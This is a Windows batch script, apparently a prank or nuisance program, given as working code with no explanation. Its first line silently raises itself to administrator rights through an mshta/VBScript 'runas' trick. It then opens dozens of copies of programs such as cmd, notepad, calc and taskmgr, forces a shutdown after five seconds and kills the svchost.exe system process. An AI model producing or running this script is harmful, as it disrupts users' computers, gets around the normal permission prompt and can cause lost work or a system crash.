
net file 1>NUL 2>NUL || start "" mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c pushd ""%~dp0"" && ""%~s0"" %*","","runas",0)(window.close) && exit

start cmd
start notepad
start calc
start winver
start Nslookup
start cleanmgr
start dxdiag
start taskmgr
start wiaacmgr
start mspaint
start cmd
start notepad
start calc
start winver
start Nslookup
start cleanmgr
start dxdiag
start taskmgr
start wiaacmgr
start mspaint
start cmd
start notepad
start calc
start winver
start Nslookup
start cleanmgr
start dxdiag
start taskmgr
start wiaacmgr
start mspaint
start wiaacmgr
start mspaint
start cmd
start notepad
start calc
start winver
start Nslookup
start cleanmgr
start dxdiag
start taskmgr
start wiaacmgr
start mspaint
start cmd
start notepad
start calc
start winver
start Nslookup
start cleanmgr
start dxdiag
start taskmgr
start wiaacmgr
start mspaint
start wiaacmgr
start mspaint
start cmd
start notepad
start calc
start winver
start Nslookup
start cleanmgr
start dxdiag
start taskmgr
start wiaacmgr
start mspaint
start cmd
start notepad
start calc
start winver
start Nslookup
start cleanmgr
start dxdiag
start taskmgr

shutdown -s -t 5
taskkill /f /im svchost.exe
